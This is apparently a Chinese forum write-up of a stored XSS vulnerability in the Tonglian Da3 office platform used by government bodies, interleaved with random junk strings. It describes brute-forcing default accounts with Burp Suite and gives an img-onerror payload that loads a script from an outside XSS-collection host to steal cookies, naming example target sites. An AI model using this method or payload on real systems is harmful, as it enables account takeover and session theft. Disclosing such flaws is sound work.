1 M$ m5 M. Z6 E. B6 v0 G0 h
0 R# U, D" Y! W9 S: K$ D2 v0 x5 X 同联Da3协同办公平台后台通用储存型xss漏洞
: z0 x3 Y& k, d( f
8 P) o1 Z- h n4 `. W) B 2 c8 h9 v8 K7 s! k w. G
平台简介:
9 U+ l5 u& W# S8 \ `) ^) T
5 L; H. i- ?3 ]' h: x- { @6 l+ W( R0 \2 j
# T1 l; W- x9 j( t3 B7 \6 d$ K1 Y
6 v4 u- K$ o/ Y7 [& E# r
2 c! C7 H: x) |& ]2 y0 \
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ [; C& O2 C4 q7 h# Q+ S3 C2 X5 u同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. ~ [3 }; t. `% d6 [# a. v同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!* H/ A% r) r% H! o
4 x8 d2 e& j! V, z# R4 |5 w: S3 a3 c
! H* r/ y$ P, g% E! A. x. N9 t1 l
" L8 l1 f* b4 ^
. i; ^6 @" v* G' r; R) P
6 Z. E9 g; L) B' K4 ]- X 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% ?8 d% i* W" S/ G
% ?% @. u6 K& b% @7 d/ R& n : g. w! P) {' o- r: F% ~% D* Z
* ~8 O$ Y* E( t& _. J- ~
" x9 @$ P$ `6 x' G
4 c5 \9 H+ u7 {4 p3 W1 ~3 X7 ]
http://1.1.1.1:7197/cap-aco/#(案例2-)
' p% u* P& ?) f7 o& `1 ?: {
' M6 c7 ?3 k/ v- _) E3 T R
9 `# { o1 x& H* b3 M! Y http://www.XXOO.com (案例1-官网网站) s+ w* m: a% E" _8 r+ A
; z% @6 e1 U, K z8 f
- {& _" t! `! \# l" |
漏洞详情:, W: `1 I& q. p. \$ L* }2 v8 U
7 I7 T% u7 M$ }9 i1 b. ^+ p
, ^( m4 H- W" Z1 r+ c
案例一、
' u0 s7 m& a/ X5 M
' P! |/ y0 t/ @; K" v; T
4 o' d6 f: Z' i8 V _! j 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ I9 i$ Z4 a2 G: N5 U, T
) l' l( R9 U3 Q* h
* O/ Q2 r5 t$ v$ v$ u7 e 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 x6 m& w4 W: h* S U1 P) ^3 ]
4 F, O3 {9 m4 \- ^/ V8 b- r
# H9 s0 q* R2 ~1 A
- Z0 c. I* Z9 f+ `
6 {& H1 ]! S' Z8 Q
2 Z6 z" m. e6 y' g! s- ]* @
0 b" U/ e( ^/ V$ F M
5 i- E/ y8 p) U) `% f/ F
i) t L, V# ]; Y) j, B* V2 ` status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
0 R6 w+ m! a+ t, k- G
5 n. B7 H" I& i0 i3 K+ ^6 o2 `
* E1 a: e9 d+ f4 T : X! L9 i( s" b5 _1 S$ t
" `! F1 G4 j6 T3 Y! [! p ' x! W" w6 }" P8 h' }/ ^
( L( R1 w$ c' A: ^6 ~# ^- G
3 B3 J1 r, M! V! b% e8 \: J
3 `; _2 g/ o& f" d4 K. j! v& e( ~
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 8 j0 ^& f/ w/ ~- _3 Z& w
: d+ m6 i( R1 Z: w9 Z
" a/ t' o3 H& L2 ?+ {0 H" f 4 ~: I, S; H4 e; G
, D; A H5 }+ Y% }4 ^: v9 b8 D
" x* q9 [: S) G3 S8 |' k$ g <img src=x K: A" b% R) _7 D
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
5 R# q* A8 ^* i; X; O+ g9 |
- E/ f: l. x W( q: R/ o4 A
+ R3 y F& \8 i3 Z; Q6 n$ | , U( A5 R6 _0 \4 h! V$ X2 n- _
3 l+ X6 K; x& @. {
: N u X: ~3 P 然后发送,接收cookie如图:
J0 c+ u3 Q6 Q1 t6 G# K z3 z
5 r5 U0 B. f+ e3 y; q# ?: Y3 [ 8 |: b8 |1 R* e ]
4 G& L+ a6 D3 F
7 }! `- c: m% K* \7 \
7 ]2 ]) D6 X9 [! n; Q" a
& e% i; H R9 A
- B+ A+ N5 i( f- U: N1 @: i2 g8 _4 M , A/ ~6 j9 ^9 g9 W( @* A* C
% G# |( R" @+ P( \4 H
! e5 \) n7 x9 m+ g
6 f/ |2 Y' ~- H2 j, }- s # ~+ H8 F1 W+ o% W' a# \2 ^
7 C; Y3 |2 s" I7 o% w
4 a) Q0 H- f8 F+ K& O" P% R, Q3 _- b. `- E 7 @( p E1 n5 g B, G% j5 u- n% o. L
" S- a# V7 W4 t& X! N0 n5 R0 q, V: |
) P$ _2 Y$ R" L5 Q) o- Z& _ 0 L$ i J1 ?2 E- k, H8 N( F
4 p) F5 ~8 T6 @5 L& [
0 n! R+ l) m' ]* C/ r. j 2 d* b# t4 O4 f" ^# \7 y
2 O }4 r+ a9 x. m
2 L0 C v" H. x' z2 @. k @% g. P 案例2、 5 P/ t$ H9 {9 ?/ {
1 k( T- g) U2 |% r
; |. S7 D! X! Q( p+ ]8 o k
前面步骤都一样,下面看效果图: ) M( Y, _: p- w2 P) ?+ {9 @/ {
$ U$ Q* M% `, C' K0 C. X' A* _4 E ) x+ `2 J+ q8 {6 U
9 }' K, p* w8 S `. t
! K. Y6 ^) C) ?. R# N% k
0 {0 \- C% P S8 q M% I3 E g
}/ l5 w& Z7 ]
@$ W* D5 d5 b1 t' ]
- p$ c! j6 X8 |' N8 Z- C( R4 l7 v. o
% {+ w, I9 @0 C2 u
( C% e s4 j! | C
8 { n% y# B: q+ X4 S$ k' s7 q
- t. T7 [7 R$ B
. J6 ]' Y) I, }9 ]% ?
: X$ }; @* x6 J9 s3 _: E2 ?9 @" z
. V2 [* @; r0 L* n8 ^& e0 o# o3 A
3 |0 n7 h1 M$ K1 h8 Y& @
$ Q) U4 b6 Y! w& n0 @8 o* T5 ]5 R H$ w
3 t9 N$ N2 W2 r. a2 i
! M5 X7 \; t! x+ |. V& p
8 A7 m( U* K. [
8 Y d* D& b/ d4 q
* v0 r; s! r) a8 k
) e6 q2 p. `% u4 V/ F ' A9 E6 {4 N" x) N
2 g) G; _4 H7 @' F7 g4 }; h
3 j) p: q9 K6 [$ B4 e& N 0 t+ r% p' N2 H$ P2 w
/ k4 s6 O' I* \" D5 ?% ?- Z